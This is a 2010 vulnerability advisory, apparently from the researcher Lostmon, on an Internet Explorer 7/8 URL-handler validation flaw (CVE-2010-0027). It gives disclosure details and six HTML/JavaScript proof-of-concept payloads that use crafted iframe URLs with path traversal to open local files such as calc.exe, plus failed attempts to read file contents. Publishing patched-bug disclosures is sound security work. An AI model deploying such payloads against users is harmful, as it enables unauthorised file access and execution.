Internet Explorer 7 / 8 URL Validation

`############################################  
Internet explorer 7 & 8 url validation vulnerability  
Original Advisore: http://lostmon.blogspot.com/  
2010/02/internet-explorer-7-8-url-validation.html  
Vendor URl: http://www.microsoft.com  
related adv:http://lostmon.blogspot.com/  
2010/02/internet-explorer-6-7-8-url-validation.html  
related bulletin: MS10-002 and ms10-007  
Related CVE 2010-0027  
Related OSVDB ID: 62245 and 62245  
Related Secunia: SA38501 and SA38209  
Related BID: 37884  
############################################  
  
  
############  
Description  
############  
  
  
A remote code execution vulnerability exists in the way  
that Internet Explorer incorrectly validates input. An  
attacker could exploit the vulnerability by constructing  
a specially crafted URL. When a user clicks the URL, the  
vulnerability could allow remote code execution. An  
attacker who successfully exploited this vulnerability  
could gain the same user rights as the logged-on user.  
If a user is logged on with administrative user rights,  
  
  
#################  
Versions afected  
#################  
  
I have tested in Internet Explorer 7 & 8  
in this versions of windows  
  
All versions of Windows 7  
Windows xp home  
Windows xs pro  
  
So you can look the explotability index  
>From Relared Microsoft bulletin to get  
a complete List of products affected.  
  
#############  
Timeline  
#############  
  
discovered 05-11-2009  
Reported to vendor 15-11-2009  
Vendor response:15-11-2009  
vendor accepts in case manager 19-11-2009  
vendor patch 21-01-2010  
Vendor Patch2:09-02-2010  
Public Disclosure: 21-01-2010  
Details Disclosure:10-02-2010  
  
  
##############  
Solution  
##############  
  
See  
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx  
and  
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx  
  
for more details and for download vendor's patch  
  
#######################  
Sample code and PoC´s  
#######################  
  
This Vulnerability is bassed in the way  
that Internet explorer validate Uri handlers  
and the special chart '#'  
  
for testing and undestanding first open internet explorer  
and write in teh address bar a fake handler like `handler:'  
it cause that IE shows 'res://ieframe.dll/unknownprotocol.htm'  
internal page , because the protocol is unknow.  
if we do => handler:http://[some-host]' Ie wait to open  
the host, but don´t show any error or unknow protocol  
error page.  
  
If we Write at the adrress bar 'handler:handler2:'  
IE shows again 'res://ieframe.dll/unknownprotocol.htm' page.  
  
But if we concatenate two unknow protocol handlers and  
use the special char '#' like 'handler:handler#:'  
internet explorer shows a alert warning  
with 'internet explorer can´t find file:///'  
  
With this convination IE use file: protocol handler.  
  
With this alert we can think... if we concatenate two handlers and #  
char and a file path we can access to files on the hard disk.  
  
"handler:handler#:c:\windows\calc.exe'  
But we get again 'internet explorer can´t find the file'  
  
Them we look for trasversal file access like  
handler:handler#:../../../../C:\windows/calc.exe’  
Them Ie promp us to download or execute the file.  
we have bypass the restrictions!!!  
  
so we are working in the address bar  
Can a web page use this issue to make the same and ask  
for download it ? YES  
  
we can construct a web page with a iframe like:  
  
############# PoC one #################  
<html>  
<iframe id="myIframe"  
src="handler:handler#:../../../../C:\windows/calc.exe">  
</html>  
################# EOF #################  
  
If we open it via local folder, or via local server or  
lan server or remote server, in all cases iE ask for download  
  
them we can access any file in the hard disk so  
can we execute or read the content of a file ?? YES  
  
if we know a txt file path we can do similar  
( put a txt file in c: root and wite some content it)  
and them :  
  
############## PoC Two #############  
<html>  
<iframe id="myIframe"  
src="handler:handler#:../../../../C:\our_txtfile.txt">  
</html>  
  
############# EOF #################  
  
wen we open this Poc , it read the content from our_txtfile.txt  
and show it in the frame.  
  
  
we can execute files ?? YES  
  
we can execute a html file or xml file or search-ms files  
from hard disk for example:  
  
############# PoC Tree ###############  
<html>  
<iframe id="myIframe"  
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">  
</iframe>  
</html>  
  
############### EOF ###########  
  
if we look it executes Explorer with a local search :D  
  
  
can we read the content of any file and upload it to a server or  
manage the content ??  
  
i don´t have found a way to do it  
all times internet explorer denies the access to the content from  
iframe.  
  
############# PoC four ##############  
  
<html>  
<head>  
</head>  
<body>  
<script type="text/javascript">  
function getContentFromIframe(iFrameName)  
{  
var myIFrame = document.getElementById(iFrameName);  
var content = myIFrame.contentWindow.document.body.innerHTML;  
alert('content: ' + content);  
  
content = 'change iframe content';  
myIFrame.contentWindow.document.body.innerHTML = content;  
}  
</script> <iframe id="myIframe"  
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>  
  
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>  
  
</body>  
</html>  
  
##################### EOF #############################  
  
it give a access deniet error  
if we look to use XMLHttpRequest()  
  
it does not work again and access is denied:  
  
########### PoC Five ######################  
var contents;  
var req;  
req = new XMLHttpRequest();  
req.onreadystatechange = processReqChange;  
req.open(’GET’,  
‘handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms’,  
true);  
req.send(”);  
############ EOF #############  
  
if we use it as a activex it  
shows again a access denied :P  
  
############### PoC six #############  
  
<html><body><div>  
  
<script>  
function getHTTPObject()  
{  
if (typeof XMLHttpRequest != 'undefined')  
{  
return new XMLHttpRequest();  
}  
try {  
return new ActiveXObject("Msxml2.XMLHTTP"); }  
catch (e)  
{  
try  
{  
return new ActiveXObject("Microsoft.XMLHTTP");  
}  
catch (e) {}  
}  
return false;  
}  
x = getHTTPObject();  
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);  
x.send(null);  
alert(x.responseText);  
  
</script>  
  
</div></body></html>  
  
################ EOF ######################  
  
Them we can think that we can read txt files , execute html,xml  
search-ms files , and download and execute Binaries files from the  
victims hard disk , only with view a crafted web page.  
  
Microsoft has pached it and has release a secutiry bulletin  
that solve this issue see  
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx  
and  
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx  
for details and for download the security update that solve this  
issue and seven vulnerabilities more.  
  
#################### €nd ################  
  
Thnx to Google security Team for his support  
Thnx to MSRC for his support and acknowledgments  
Thnx To icar0 & sha0 from Badchecksum  
Thnx To Brink For test with me in some windows :D  
Thns to estrella to be my ligth  
  
--   
atentamente:  
Lostmon ([email protected])  
Web-Blog: http://lostmon.blogspot.com/  
Google group: http://groups.google.com/group/lostmon (new)  
--  
La curiosidad es lo que hace mover la mente....  
`